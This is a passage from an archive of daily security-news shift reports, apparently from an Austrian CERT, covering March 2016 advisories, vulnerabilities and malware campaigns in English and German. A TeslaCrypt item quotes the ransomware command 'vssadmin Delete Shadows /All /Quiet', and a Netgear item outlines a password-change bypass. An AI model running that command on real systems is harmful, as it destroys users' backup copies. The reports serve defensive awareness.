https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-151221… *** [HTB23293]: Remote Code Execution via CSRF in iTop *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present .. --------------------------------------------- https://www.htbridge.com/advisory/HTB23293 *** Lets Encrypt tritt CA/Browser Forum bei *** --------------------------------------------- Der nächste Schritt hin zu einer anerkannten Zertifizierungsstelle ist getan: Als Mitglied im CA/Browser Forum bewegt sich Let's Encrypt nun auf Augenhöhe mit Comodo, Symantec & Co. --------------------------------------------- http://heise.de/-3144202 *** Auch DDR4-Speicher für Bitflips anfällig *** --------------------------------------------- Offenbar sind mehr Arbeitsspeicher-Varianten für den Rowhammer-Angriff verwundbar, als bislang gedacht. Forscher haben jetzt einen Angriff auf DDR4-Speicher vorgestellt, auch professionelle Serverspeicher sollen betroffen sein. --------------------------------------------- http://www.golem.de/news/rowhammer-auch-ddr4-speicher-fuer-bitflips-anfaell… *** Sicherheits-Updates für Symantecs Endpoint Protection *** --------------------------------------------- Drei Lücken schließt das aktuelle Update für Symantecs Endpoint Protection (SEP), darunter eine SQL Injection. --------------------------------------------- http://heise.de/-3144528 *** Biometrics not a magic infosec bullet for web banking, warns GCHQ bloke *** --------------------------------------------- You can change a password. You cant change fingerprints Around the world, banks are implementing biometric authentication systems for their customers as fraud cases increase - but experts warn biometrics should not be treated like a silver bullet for ID .. --------------------------------------------- www.theregister.co.uk/2016/03/18/biometrics_not_answer_online_banking_secur… *** Security: Neuer Stagefright-Exploit betrifft Millionen Android-Geräte *** --------------------------------------------- Stagefright bedroht viele nach wie vor ungepatchte Android-Geräte weltweit, gilt aber als schwierig auszunutzen. Eine neue Technik erfordert etwas Infrastruktur, dürfte aber größere praktische Relevanz haben. --------------------------------------------- http://www.golem.de/news/security-neuer-stagefright-exploit-betrifft-millio… *** DDoS-Attacken auf Schweizer Websites *** --------------------------------------------- In der Schweiz gab es in der vergangenen Woche eine Reihe von DDoS-Angriffen auf Online-Shops, die Schweizerischen Bundesbahnen und Finanzinstitute. In einem Fall wurden .. --------------------------------------------- http://heise.de/-3144854

1 0

Tageszusammenfassung - Donnerstag 17-03-2016
by Daily end-of-shift report 17 Mar '16

17 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 16-03-2016 18:00 − Donnerstag 17-03-2016 18:00 Handler: Robert Waldner Co-Handler: n/a *** Blundering ransomware uses backdoored crypto, unlock keys spewed *** --------------------------------------------- Hahah ... wait, what? A software developer whose example encryption code was used by a strain of ransomware has released the decryption keys for the malware. --------------------------------------------- http://www.theregister.co.uk/2016/03/16/locky_ransomware_undone_for_now/ *** Netgear CG3000v2 Password Change Bypass *** --------------------------------------------- I noticed a security issue in my Netgear CG3000v2 cable modem, as provided by Optus (an Australian phone/communications provider). The "admin password" can be changed on the web interface, without providing the current password. The page http://192.168.0.1/SetPassword.asp prompts for old and new passwords (and repeat of new), but in fact ignores the old password provided, and changes the password to the new one, regardless. --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030089 *** 2015-12-10: POODLE Vulnerability in RTU500 Series *** --------------------------------------------- Affected Products: RTU500 series firmware of release 10 less than version 10.8.6 and of release 11 less than 11.2.1. RTU500 series releases 9 and less are not affected. Summary: A vulnerability has recently been published that affects the SSL protocol 3.0 and is commonly referred to as “POODLE”. The vulnerability affects the product versions listed above. --------------------------------------------- http://search.abb.com/library/Download.aspx?DocumentID=1KGT090264&LanguageC… *** ADAC: Autos mit Keyless-Schlüssel sehr leichter zu stehlen *** --------------------------------------------- Diebe können sich eine Sicherheitslücke in der Funkverbindung zunutze machen --------------------------------------------- http://derstandard.at/2000033077997 *** APT Attackers Flying More False Flags Than Ever *** --------------------------------------------- Investigators continue to focus on attack attribution, but Kaspersky researchers speaking at CanSecWest 2016 caution that attackers are manipulating data used to tie attacks to perpetrators. --------------------------------------------- http://threatpost.com/apt-attackers-flying-more-false-flags-than-ever/11681… *** sol06223540: F5 TCP vulnerability CVE-2015-8240 *** --------------------------------------------- Improper handling of TCP options under some circumstances may cause a denial-of-service (DoS) condition. (CVE-2015-8240) Versions known to be vulnerable: 11.6.0 HF5, 11.5.3 HF2, 11.4.1 HF9 on various BIG-IP products --------------------------------------------- https://support.f5.com/kb/en-us/solutions/public/k/06/sol06223540.html *** Metaphor - A (real) reallife Stagefright exploit *** --------------------------------------------- The team here at NorthBit has built a working exploit affecting Android versions 2.2 - 4.0 and 5.0 - 5.1, while bypassing ASLR on versions 5.0 - 5.1 (as Android versions 2.2 - 4.0 do not implement ASLR). --------------------------------------------- https://www.exploit-db.com/docs/39527.pdf *** Xen XSA-171: I/O port access privilege escalation in x86-64 Linux *** --------------------------------------------- User mode processes not supposed to be able to access I/O ports may be granted such permission, potentially resulting in one or more of in-guest privilege escalation, guest crashes (Denial of Service), or in-guest information leaks. --------------------------------------------- http://xenbits.xen.org/xsa/advisory-171.html *** BSI veröffentlicht Anforderungskatalog für Cloud Computing *** --------------------------------------------- Anhand des Katalogs können Kunden von Cloud-Dienstleistern herausfinden, wie es um die Informationssicherheit in einer Cloud steht. Aber auch Anbieter solcher Dienste können sich damit etwa auf eine anstehende Zertifizierung vorbereiten. --------------------------------------------- http://heise.de/-3141368 *** Introducing SHIPS - Centralized Password Management *** --------------------------------------------- The Shared Host Integrated Password System (SHIPS) is an open-source solution created by Geoff Walton from TrustedSec to provide unique and rotated local super user or administrator passwords for environments where it is not possible or not appropriate to disable these local accounts. Our goal is to make post exploitation more difficult and provide a simplistic way to manage multiple systems in an environment where Windows does not necessarily support an alternative. SHIPS supports both Linux --------------------------------------------- https://www.trustedsec.com/january-2015/introducing-ships-centralized-local… *** New NIST Encryption Guidelines *** --------------------------------------------- NIST has published a draft of their new standard for encryption use: "NIST Special Publication 800-175B, Guideline for Using Cryptographic Standards in the Federal Government: Cryptographic Mechanisms." In it, the Escrowed Encryption Standard from the 1990s, FIPS-185, is no longer certified. And Skipjack, NSAs symmetric algorithm from the same period, will no longer be certified. --------------------------------------------- https://www.schneier.com/blog/archives/2016/03/new_nist_encryp.html *** Scores of Serial Servers Plagued by Lack of Authentication, Encryption *** --------------------------------------------- Thousands of serial servers connected to the internet arent password protected and lack encryption, leaving any data that transfers between them and devices theyre connected to open to snooping, experts warn. --------------------------------------------- http://threatpost.com/scores-of-serial-servers-plagued-by-lack-of-authentic… *** VU#897144: Solarwinds Dameware Remote Mini Controller Windows service is vulnerable to stack buffer overflow *** --------------------------------------------- The Solarwinds Dameware Remote Mini Controller Windows service is vulnerable to stack buffer overflow. Description CWE-121: Stack-based Buffer Overflow - CVE-2016-2345 Solarwinds Dameware Remote Mini Controller is a software for assisting in remote desktop connections for helpdesk support. --------------------------------------------- http://www.kb.cert.org/vuls/id/897144 *** Bypassing NoScript Security Suite Using Cross-Site Scripting and MITM Attacks *** --------------------------------------------- This paper discusses different techniques that an attacker can use to bypass NoScript Security Suite Protection. These techniques can be used by malicious vectors in bypassing the default installation of NoScript. The paper also provides solutions and recommendations for end-users that can enhances the current protection of NoScript Security Suite. --------------------------------------------- https://mazinahmed.net/uploads/Bypassing%20NoScript%20Security%20Suite%20Us… *** Symantec Endpoint Protection Multiple Security Issues *** --------------------------------------------- Symantec Endpoint Protection (SEP) was susceptible to a number of security findings that could potentially result in an authorized but less privileged user gaining elevated access to the Management Console. SEP Client security mitigations can potentially be bypassed allowing arbitrary code execution on a targeted client. --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** IBM Security Bulletin *** --------------------------------------------- *** IBM Rational DOORS Web Access is affected by Apache Tomcat vulnerabilities (CVE-2015-5345, CVE-2015-5351) *** http://www.ibm.com/support/docview.wss?uid=swg21978300 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Rational ClearCase (CVE-2015-7575, CVE-2015-4872, CVE-2015-4893, CVE-2015-4803) *** http://www.ibm.com/support/docview.wss?uid=swg21976573 --------------------------------------------- *** IBM Security Bulletin: OpenStack vulnerabilities affect IBM SmartCloud Entry (CVE-2015-7713, CVE-2015-5286) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023399 --------------------------------------------- *** IBM Security Bulletin: OpenStack vulnerabilities affect IBM SmartCloud Entry(CVE-2015-5163 CVE-2015-3241 CVE-2015-5223) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023469 --------------------------------------------- *** IBM Security Bulletin: OpenStack vulnerabilities affect IBM Cloud Manager with Openstack (CVE-2015-5163 CVE-2015-3241 CVE-2015-5223) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023470 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 16-03-2016
by Daily end-of-shift report 16 Mar '16

16 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 15-03-2016 18:00 − Mittwoch 16-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Bugtraq: [security bulletin] HPSBGN03556 rev.1 - ArcSight ESM and ESM Express, Remote Arbitrary File Download, Local Arbitrary Command Execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/537801 *** Exploit Kits in 2015: Scale and Distribution *** --------------------------------------------- In the first part of this series of blog posts, we discussed what new developments and changes in the exploit kit landscape were seen in 2015. In this post, we look at the scale of the exploit kit problem - how many users were affected, .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/exploit-kits-201… *** Apache Struts Input Validation Flaw in I18NInterceptor Lets Remote Conduct Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1035272 *** Apache Struts Double OGNL Evaluation Lets Remote Users Execute Arbitrary Code on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1035271 *** VMware vRealizes that vRealize has XSS bugs on Linux *** --------------------------------------------- Virtzillas also released first maintenance release for vRealize Automation A tricky Tuesday for VMwares vRealize products, which have received the first maintenance release for version 7 and also become the subject of a security alert. --------------------------------------------- www.theregister.co.uk/2016/03/16/vmware_vrealizes_that_vrealize_has_xss_bug… *** OpenSSH 7.2p1 xauth Command Injection / Bypass *** --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030083 *** TeslaCrypt 3.1? New Ransomware Strain Removes ShadowCopies via WMI *** --------------------------------------------- The authors of TeslaCrypt 3.1 ransomware understood that the common ransomware action of deleting shadow copies by executing "vssadmin Delete Shadows /All /Quiet" draws the defenders attention, and so they worked around that by using WMI. --------------------------------------------- http://www.minerva-labs.com/ *** subsearch *** --------------------------------------------- subsearch is a command line tool designed to brute force subdomain names. It is aimed at penetration testers and bug bounty hunters and has been built with a focus on speed, stealth and reporting. --------------------------------------------- https://github.com/gavia/subsearch *** Git Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1035290 *** FortiOS open redirect vulnerability *** --------------------------------------------- The FortiOS webui accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. The redirect input parameter is also prone to a cross site scripting. --------------------------------------------- http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability *** IBM Security Bulletin: Vulnerabilities in java affect Power Hardware Management Console (CVE-2016-0448) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=nas8N1021172 *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect Tivoli Provisioning Manager for OS Deployment and Tivoli Provisioning Manager for Images (CVE-2016-0777, CVE-2016-0778) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21978487 *** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM WebSphere MQ (CVE-2015-1788) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21972125 *** DDoSing with Other Peoples Botnets *** --------------------------------------------- While I was reverse engineering ZeroAccess in order to write a monitoring system, I had an idea which would allow me to use ZeroAccess C&C infrastructure to reflect and amplify a UDP based DDoS attack, which Id found to be beautifully ironic. After further analysis, I discovered it may even be possible to use non worker bots (which connect from behind NAT) to participate in the attack. --------------------------------------------- http://www.malwaretech.com/2016/03/ddosing-with-other-peoples-botnets.html *** DFN-CERT-2016-0461/">Foxit Reader, Foxit PhantomPDF: Mehrere Schwachstellen ermöglichen u.a. verschiedene Denial-of-Service-Angriffe *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0461/ *** Nacktfotos von Prominenten: Verdächtiger gesteht Phishing-Angriff auf iCloud *** --------------------------------------------- Im Verfahren um die Veröffentlichung von privaten Promifotos hat sich der Verdächtige des Phishings schuldig bekannt. Doch mit der Veröffentlichung der Bilder will der Mann nichts zu tun haben. --------------------------------------------- http://www.golem.de/news/nacktfotos-von-prominenten-verdaechtiger-gesteht-p… *** HTTPS: 77 Prozent aller Google-Anfragen verschlüsselt *** --------------------------------------------- In seinem Transparenzbericht dokumentiert Google nun auch den Prozentsatz von Transportverschlüsselung bei seinen eigenen Diensten und Anfragen an Server der Suchmaschine. Vor allem der hohe Wert bei der Verteilung von Werbung überrascht. --------------------------------------------- http://heise.de/-3140351 *** Erpressungstrojaner auf Websites von New York Times und BBC *** --------------------------------------------- Potenziell Millionen Nutzer gefährdet, Sicherheitsforscher sehen Beleg für Schwächen des Werbenetzwerks --------------------------------------------- http://derstandard.at/2000033046874 *** AceDeceiver: iOS-Trojaner nutzt Schwachstellen in Apples DRM *** --------------------------------------------- Angreifern ist es einer Sicherheitsfirma zufolge gelungen, Schad-Software mehrfach ungehindert in den App Store zu bringen. Durch Schwachpunkte in Apples DRM FairPlay könne die Malware zudem auf iPhones gelangen - ohne Enterprise-Zertifikat. --------------------------------------------- http://heise.de/-3140627

1 0

Tageszusammenfassung - Dienstag 15-03-2016
by Daily end-of-shift report 15 Mar '16

15 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 14-03-2016 18:00 − Dienstag 15-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Typosquatters Target Mac Users With New '.om' Domain Scam *** --------------------------------------------- http://threatpost.com/typosquatters-target-apple-mac-users-with-new-om-doma… *** Juniper: Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800) *** --------------------------------------------- On March 1, 2016, a cross-protocol attack was announced by OpenSSL that could lead to decryption of TLS sessions by using a server supporting SSLv2 and EXPORT cipher suites as a Bleichenbacher RSA padding oracle. Note that traffic between clients and non-vulnerable servers can be decrypted provided another server supporting SSLv2 and EXPORT ciphers (even with a different protocol such as SMTP, IMAP or POP) shares the RSA keys of the non-vulnerable server. This vulnerability is known as DROWN (CVE-2016-0800). --------------------------------------------- http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10722 *** Citrix XenApp and XenDesktop Hardening Guidance *** --------------------------------------------- https://www.fireeye.com/blog/threat-research/2016/03/citrix_xenapp_andxe.ht… *** Complete Tour of PE and ELF: Part 2 *** --------------------------------------------- We covered some important sections in Part 1 of this series. In this part, we will cover some more complex data structures covering some important concepts of binaries. Here is what we are looking at: If you can recall in Optional header, .. --------------------------------------------- http://resources.infosecinstitute.com/complete-tour-of-pe-and-elf-part-2/ *** Adrian Dabrowski @ Troopers TelcoSecDay 2016 *** --------------------------------------------- Today Adrian Dabrowski gives his talk 'Towards Carrier Based IMSI Catcher Detection' at the TelcoSecDay 2016. Abstract: In this presentation we discuss multiple detection capabilities of IMSI Catchers (aka Stingray) from the network .. --------------------------------------------- https://www.sba-research.org/2016/03/15/adrian-dabrowski-troopers-telcosecd… *** How broken is SHA-1 really? *** --------------------------------------------- SHA-1 collisions may be found in the next few months, but that doesnt mean that fake SHA-1-based certificates will be created in the near future. Nevertheless, it is time for everyone, and those working in security in particular, to move away from outdated hash functions. Read more --------------------------------------------- https://www.virusbulletin.com/blog/2016/march-2016/how-broken-sha-1-really/ *** BSI-Leitfaden zum Umgang mit Erpressungs-Trojanern *** --------------------------------------------- Das BSI informiert in einem knappen Leitfaden Behörden und Unternehmen über die Bedrohung durch Krypto-Trojaner und wie man sich im Ernstfall verhalten sollte. --------------------------------------------- http://heise.de/-3135866 *** From Stolen Wallet to ID Theft, Wrongful Arrest *** --------------------------------------------- Its remarkable how quickly a stolen purse or wallet can morph into full-blow identity theft, and possibly even result in the victims wrongful arrest. All of the above was visited recently on a fellow infosec professional whose admitted lapse in physical security lead to a mistaken early morning arrest in front of his kids. --------------------------------------------- http://krebsonsecurity.com/2016/03/from-stolen-wallet-to-id-theft-wrongful-…

1 0

Tageszusammenfassung - Montag 14-03-2016
by Daily end-of-shift report 14 Mar '16

14 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 11-03-2016 18:00 − Montag 14-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** VU#713312: DTE Energy Insight app vulnerable to information exposure *** --------------------------------------------- The DTE Energy Insight app API allows an authenticated user to obtain and query certain limited customer information from other customers. --------------------------------------------- http://www.kb.cert.org/vuls/id/713312 *** Mehr als zwei Jahre alter Java-Security-Patch von Oracle immer noch verwundbar *** --------------------------------------------- Geht es nach dem Sicherheitsexperten Adam Gowdiak hat Oracle vor mehr als zwei Jahren eine Sicherheitslücke falsch bewertet und zudem bei dem Patch gepfuscht, der den Fehler eigentlich hätte beseitigen sollen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Mehr-als-zwei-Jahre-alter-Java-Secur… *** The Source of All Major Android Banking Trojans Just Got Updated To V2 *** --------------------------------------------- An anonymous reader writes: Apparently, during the past months it has started coming to the surface the fact that most top-tier Android malware was actually related, coming from a common malware variant called GM Bot, and sold for only .. --------------------------------------------- http://news.slashdot.org/story/16/03/12/1556259/the-source-of-all-major-and… *** Google Chrome Extension Caught Stealing Bitcoin From Users *** --------------------------------------------- An anonymous reader writes: Bitcoin exchange portal Bitstamp is warning users of a Google Chrome extension that steals their Bitcoin when making a transfer. According to Bitstamp, this extension contains malicious code that is redirecting .. --------------------------------------------- http://news.slashdot.org/story/16/03/12/2328254/google-chrome-extension-cau… *** Armada Collective is back, extorting Financial Intuitions in Switzerland *** --------------------------------------------- These extortion emails usually originate from free email service providers (such as Gmail or Openmail) and are being sent to the info@ email address of the targeted financial institution. Unlike the extortion attempts conducted by Armada Collective in September 2015, we are not aware of .. --------------------------------------------- http://www.govcert.admin.ch/blog/19/armada-collective-is-back-extorting-fin… *** Auto vulnerability scanners turn up mostly false positives *** --------------------------------------------- Automated vulnerability scanners turn up mostly false positives, but even the wild goose chase that results can be cheaper for businesses than manual processes, according to NCC Group security engineer Clint Gibler. --------------------------------------------- http://www.theregister.co.uk/2016/03/14/cheap_auto_vulnerability_scanners_c… *** SSA-833048 (Last Update 2016-03-14): Vulnerability in SIMATIC S7-1200 CPUs prior to V4 *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-833048… *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects TS4500 (CVE-2015-7547) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=ssg1S1005695 *** IBM Security Bulletin: glibc getaddrinfo stack-based buffer overflow (CVE-2015-7547) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=isg3T1023395 *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security Network Protection *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21975835 *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM SmartCloud Entry (CVE-2016-0475 CVE-2016-0448 CVE-2015-7575 CVE-2016-0466) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=isg3T1023378 Botnets Plague the Web. This AI Is Out to Stop Them --------------------------------------------- A group of Israeli researchers believe they are the first to have discovered a way to locate botnets and identify who is behind them, by planting honeypots that gather information about attacks carried out by the network, and analyzing that data with machine learning programs. --------------------------------------------- https://motherboard.vice.com/read/botnets-plague-the-web-this-ai-is-out-to-… *** Broken 2013 Java Patch Leads to Sandbox Bypass *** --------------------------------------------- A patch for a critical 2013 Java vulnerability is incomplete, and exposes Java servers and clients to a sandbox bypass, researchers at Security Explorations of Poland said. --------------------------------------------- http://threatpost.com/broken-2013-java-patch-leads-to-sandbox-bypass/116757/

1 0

Tageszusammenfassung - Freitag 11-03-2016
by Daily end-of-shift report 11 Mar '16

11 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 10-03-2016 18:00 − Freitag 11-03-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Locky Ransomware Spreading in Massive Spam Attack *** --------------------------------------------- Researchers are tracking a massive spam campaign pelting inboxes with Locky ransomware downloaders in the form of JavaScript attachments. --------------------------------------------- http://threatpost.com/locky-ransomware-spreading-in-massive-spam-attack/116… *** Deinstallieren oder Aktualisieren: Adobe verteilt Notfall-Update für Flash *** --------------------------------------------- Es kommt nicht überraschend: Adobe veröffentlicht wieder ein Notfall-Update für den Flash-Player. Wer ihn nicht bereits deinstalliert hat, sollte das Update installieren. Auch die Digital Editions und der Adobe Reader werden versorgt. --------------------------------------------- http://www.golem.de/news/deinstallieren-oder-aktualisieren-adobe-rollt-notf… *** Security Afterworks Spezial: Secure your Enterprise - Innovative Microsoft-Security-Lösungen im Enterprise- & Mobility-Umfeld *** --------------------------------------------- April 18, 2016 - 3:00 pm - 5:00 pm Microsoft Österreich Am Europlatz 3 Wien --------------------------------------------- https://www.sba-research.org/events/security-afterworks-spezial-secure-your… *** Files compromised by ransomware Trojan for OS X can be decrypted by Doctor Web *** --------------------------------------------- March 11, 2016 At the beginning of March, numerous mass media, websites, and blogs announced about the emergence of the first ever ransomware for Mac computers. Doctor Web specialists examined this malicious program, which was named Mac.Trojan.KeRanger.2, and they have developed a method that can help to decrypt files affected by this Trojan. Mac.Trojan.KeRanger.2 was first detected in a compromised version of the installer for a popular OS X torrent client that was distributed as a DMG file. --------------------------------------------- http://news.drweb.com/show/?i=9877&lng=en&c=9 *** Cerber Ransomware - New, But Mature *** --------------------------------------------- We take a look at Cerber, Ransomware named after the mythical multi-headed dog...Categories: Malware AnalysisTags: cerberransomware(Read more...) --------------------------------------------- https://blog.malwarebytes.org/intelligence/2016/03/cerber-ransomware-new-bu… *** OpenSSH Security Advisory: x11fwd.adv *** --------------------------------------------- Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1). --------------------------------------------- http://www.openssh.com/txt/x11fwd.adv *** Cisco Gigabit Switch Router 12000 Series Routers Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Schneider Electric Telvent RTU Improper Ethernet Frame Padding Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a vulnerability caused by an Institute of Electrical and Electronics Engineers (IEEE) conformance issue involving improper frame padding in Schneider Electric's Telvent SAGE 2300 and 2400 remote terminal units. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-070-01 *** VU#270232: Quagga bgpd with BGP peers enabled for VPNv4 contains a buffer overflow vulnerability *** --------------------------------------------- Vulnerability Note VU#270232 Quagga bgpd with BGP peers enabled for VPNv4 contains a buffer overflow vulnerability Original Release date: 10 Mar 2016 | Last revised: 10 Mar 2016 Overview Quagga, version 0.99.24.1 and earlier, contains a buffer overflow vulnerability in bgpd with BGP peers enabled for VPNv4 that may leveraged to gain code execution. Description CWE-121: Stack-based Buffer Overflow - CVE-2016-2342Quagga is a software routing suite that implements numerous routing protocols for... --------------------------------------------- http://www.kb.cert.org/vuls/id/270232 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects Tivoli Provisioning Manager for OS deployment and Tivoli Provisioning Manager for Images (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21978194 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM DataPower Gateways (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977460 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects Rational Publishing Engine (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21978188 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in the GSKit component of IBM DataPower Gateways (CVE-2016-0201) *** http://www.ibm.com/support/docview.wss?uid=swg21974969 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in the GSKit component of IBM DB2 LUW (CVE-2016-0201, CVE-2015-7420 & CVE-2015-7421) *** http://www.ibm.com/support/docview.wss?uid=swg21977787 --------------------------------------------- *** IBM Security Bulletin: Cross-Site Scripting Vulnerability with the UML Vizualization tools *** http://www.ibm.com/support/docview.wss?uid=swg21978003 --------------------------------------------- *** Security Bulletin: Vulnerability in lighttpd affects IBM Integrated Management Module (IMM)(CVE-2015-3200) *** http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099226 --------------------------------------------- *** IBM Security Bulletin: The GPFS pattern provided with IBM PureApplication System is affected by a security vulnerability. (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=swg21978471 ---------------------------------------------

1 0

Tageszusammenfassung - Donnerstag 10-03-2016
by Daily end-of-shift report 10 Mar '16

10 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 09-03-2016 18:00 − Donnerstag 10-03-2016 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** First Principles for Network Defenders: A Unified Theory for Security Practitioners *** --------------------------------------------- Great thinkers like Aristotle, Descartes and Elon Musk have said that, in order to solve really hard problems, you have to get back to first principles. First principles in a designated .. --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/03/first-principles-for-net… *** DSA-3509 rails - security update *** --------------------------------------------- Two vulnerabilities have been discovered in Rails, a web applicationframework written in Ruby. Both vulnerabilities affect Action Pack, whichhandles the web requests for Rails. --------------------------------------------- https://www.debian.org/security/2016/dsa-3509 *** Powershell Malware - No Hard drive, Just hard times, (Wed, Mar 9th) *** --------------------------------------------- ISC Reader Eric Volking submitted a very nice sample of some Powershell based malware. Lets take a look! The malware starts inthe traditional way, by launching itself with an .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20823 *** Bugtraq: [CORE-2016-0004] - SAP Download Manager Password Weak Encryption *** --------------------------------------------- http://www.securityfocus.com/archive/1/537746 *** Bugtraq: [CORE-2016-0003] - Samsung SW Update Tool MiTM *** --------------------------------------------- http://www.securityfocus.com/archive/1/537750 *** DSA-3512 libotr - security update *** --------------------------------------------- Markus Vervier of X41 D-Sec GmbH discovered an integer overflowvulnerability in libotr, an off-the-record (OTR) messaging library, inthe way how the sizes of portions of incoming messages were stored. Aremote attacker can exploit this .. --------------------------------------------- https://www.debian.org/security/2016/dsa-3512 *** DSA-3511 bind9 - security update *** --------------------------------------------- https://www.debian.org/security/2016/dsa-3511 *** Security Advisory: BIND vulnerability CVE-2016-2088 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/59/sol59692558.html *** Security Advisory: BIND vulnerability CVE-2016-1285 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/46/sol46264120.html *** Security Advisory: BIND vulnerability CVE-2016-1286 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/62/sol62012529.html *** Scald File - Critical - Remote Code Execution - SA-CONTRIB-2016-015 *** --------------------------------------------- When a PDF is uploaded in Scald File, various tools can be executed if theyre installed on the server, to try to generate a thumbnail out of that PDF.This is mitigated by the need to have the sufficient permissions to upload a file in Scald, .. --------------------------------------------- https://www.drupal.org/node/2684601 *** Ransomware: "Von Zahlungen ist abzuraten" *** --------------------------------------------- DDoS-Attacken, CEO-Frauds und Ransomware: Angriffe auf Firmen nehmen zu. Die futurezone hat den Sicherheitsexperten Michael Krausz dazu befragt. --------------------------------------------- http://futurezone.at/digital-life/ransomware-von-zahlungen-ist-abzuraten/18… *** Erpressungs-Trojaner: Time-Machine-Backups anfällig *** --------------------------------------------- Die Entwickler der OS-X-Ransomware KeRanger haben auch Time-Machine-Backups als Angriffsziel erwogen. Tatsächlich ist es möglich, selbst ohne Admin-Rechte Dokumente in der Datensicherung zu verändern. --------------------------------------------- http://heise.de/-3131762 *** TRUST 2016, organized by SBA Research *** --------------------------------------------- August 29, 2016 - August 30, 2016 - All Day Vienna University of Technology Gußhausstraße 27-29 Vienna --------------------------------------------- https://www.sba-research.org/events/trust-2016-organized-by-sba-research/ *** Kritische Lücke in Jabber-Verschlüsselung OTR *** --------------------------------------------- Das Protokoll Off-the-Record (OTR) und dessen Umsetzung galt als eigentlich als recht sicher. Doch jetzt entdeckten Forscher eine kritische Lücke, die es Angreifern erlaubt, eigenen Code einzuschleusen und auszuführen. Updates schließen das Loch. --------------------------------------------- http://heise.de/-3130396 *** PlugX malware: A good hacker is an apologetic hacker *** --------------------------------------------- Sometimes malware writers put messages in their malware. We found one such message in PlugX dropper. And it was pretty melodramatic .. --------------------------------------------- http://securelist.com/blog/virus-watch/74150/plugx-malware-a-good-hacker-is… *** [R4] OpenSSL 20160301 Advisory Affects Tenable Nessus *** --------------------------------------------- https://www.tenable.com/security/tns-2016-03 *** Apple Software Update 2.2 *** --------------------------------------------- Impact: An attacker in a privileged network position may be able to control the contents of the updates window --------------------------------------------- https://support.apple.com/en-us/HT206091 *** Vulnerabilities in multiple third party TYPO3 CMS extensions *** --------------------------------------------- It has been discovered that the extension "phpMyAdmin" (phpmyadmin) is susceptible to unsafe comparison of XSRF/CSRF token, multiple full path disclosure vulnerabilities, multiple XSS vulnerabilities, insecure password generation in JavaScript. --------------------------------------------- https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-… *** Security: Drown gefährdet weiterhin zahlreiche Webdienste *** --------------------------------------------- Wie schnell patchen Serverbetreiber die Drown-Sicherheitslücke? Offenbar zu langsam, sagen mehrere Sicherheitsfirmen. Bei Heartbleed lief es 